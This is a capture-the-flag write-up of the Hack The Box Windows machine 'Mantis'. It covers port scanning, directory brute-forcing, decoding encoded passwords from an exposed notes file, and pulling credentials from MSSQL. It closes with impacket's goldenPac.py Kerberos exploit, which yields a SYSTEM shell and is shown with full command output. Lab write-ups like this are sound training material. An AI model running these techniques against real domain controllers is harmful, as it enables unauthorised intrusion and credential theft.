oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 12:27:02 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Hard/5.md

334 lines
11 KiB
Markdown
Raw Blame History

---
search:
exclude: true
---
# Mantis Writeup
![](img/5.png)
## Introduction :
Mantis is a hard windows box released back in September 2017.
## **Part 1 : Initial Enumeration**
As always we start with nmap to scan for open ports, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
→ nmap -sCV 10.10.10.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 17:06 BST
Nmap scan report for 10.10.10.52
Host is up (0.57s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-25 14:10:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -36m00s, deviation: 2h18m34s, median: -1h56m01s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2020-08-25T10:11:51-04:00
| smb-security-mode:
| account_used: <****blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-25T14:11:53
|_ start_date: 2020-08-25T14:10:13
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.16 seconds
## **Part 2 : Getting User Access**
This box is one example of a machine that has alot of ports opened, and yet these are not enough. you need to enumerate every port on this machine using nmap's -p- flag:
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 19:57 GMT
Nmap scan report for 10.10.10.52
Host is up (0.037s latency).
Not shown: 65509 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
**1337/tcp open waste**
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49172/tcp open unknown
50255/tcp open unknown
57110/tcp open unknown
57114/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 32.05 seconds
And here you see the port that we missed earlier: 1337:
![](prg/5/1.png)
So let's enumerate it with gobuster and a wordlist from seclists:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ sudo apt install seclists gobuster -y
[ 10.10.14.7/23 ] [ /dev/pts/6 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.52:1337/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/02 20:09:19 Starting gobuster
===============================================================
/secure_notes (Status: 301)
Progress: 145379 / 220561 (65.91%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/01/02 20:18:25 Finished
===============================================================
And here we found the /secure_notes directory:
![](prg/5/2.png)
Let's see what's in dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez%
Now here we have a bit to talk about, first of all the string of text in the note name:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421
And here we get a hex string (0-9-a-f) so let's convert it back to ascii:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
And here we have a sql password!
And that binary string gives us the following password: @dm!n_P@ssW0rd!
@dm!n_P@ssW0rd!
m$$ql_S@_P@ssW0rd!
The next part of this box is on port 8080 which is a blog:
![](prg/5/3.png)
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ curl 10.10.10.52:8080 2>/dev/null | grep Powered
Powered by [Orchard](http://www.orchardproject.net) (C) The Theme Machine 2021.
Let's try to find the administrator page of this Orchard website using gobuster:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.52:8080
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/02 20:47:55 Starting gobuster
===============================================================
/archive (Status: 200)
/blogs (Status: 200)
**/admin (Status: 302)**
/tags (Status: 200)
/Archive (Status: 200)
/pollArchive (Status: 200)
/Blogs (Status: 200)
/newsarchive (Status: 200)
/news_archive (Status: 200)
Let's investigate the /admin page with the credentials (admin:@dm!n_P@ssW0rd!) we found earlier:
![](prg/5/4.png)
And we're logged in as admin!
![](prg/5/5.png)
However this is kind of a rabbithole, therefore you see why this can be a hard box, The next step is to poke around port 1433
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ sudo apt install dbeaver -y
` ![](prg/5/6.png) ![](prg/5/7.png) ![](prg/5/8.png) ![](prg/5/9.png)
And here we have found the user james' credentials:
james@htb.local
J@m3s_P@ssW0rd!
## **Part 3 : Getting Root Access**
Now in order to gain root access on the box we're going to use psexec:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ locate goldenPac.py
/usr/share/doc/python3-impacket/examples/goldenPac.py
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ cd /usr/share/doc/python3-impacket/examples/
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
→ python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
Once you have pasted in jame's password, wait a bit for impacket to do it's magic, and you will get root shell on the box :
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [doc/python3-impacket/examples]
→ python3 goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[-] Couldn't get forest info ([Errno Connection error (htb.local:445)] timed out), continuing
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file cviDLGQS.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service dqDR on 10.10.10.52.....
[*] Starting service dqDR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
From here type both flags:
C:\Windows\system32>type C:\Users\james\Desktop\user.txt
8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
20XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you have it!
## **Conclusion**
Here we can see the progress graph :
![](img/5_graph.png)
Reference in a new issue View git blame Copy permalink